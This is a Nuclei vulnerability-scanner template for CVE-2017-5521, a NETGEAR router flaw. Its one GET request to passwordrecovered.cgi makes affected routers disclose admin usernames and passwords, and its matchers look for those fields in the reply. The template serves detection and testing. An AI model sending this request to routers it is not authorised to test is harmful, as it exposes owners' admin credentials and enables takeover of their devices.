nuclei-templates/cves/2017/CVE-2017-5521.yaml

36 lines
1.2 KiB
YAML

id: CVE-2017-5521
info:
name: Bypassing Authentication on NETGEAR Routers
author: princechaddha
severity: high
description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
reference:
- https://www.cvedetails.com/cve/CVE-2017-5521/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
- http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
- http://www.securityfocus.com/bid/95457
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-5521
cwe-id: CWE-200
tags: cve,cve2017,auth-bypass,netgear
requests:
- method: GET
path:
- "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"
matchers-condition: and
matchers:
- type: word
words:
- "right\">Router\\s*Admin\\s*Username<"
- "right\">Router\\s*Admin\\s*Password<"
condition: and
part: body
- type: status
status:
- 200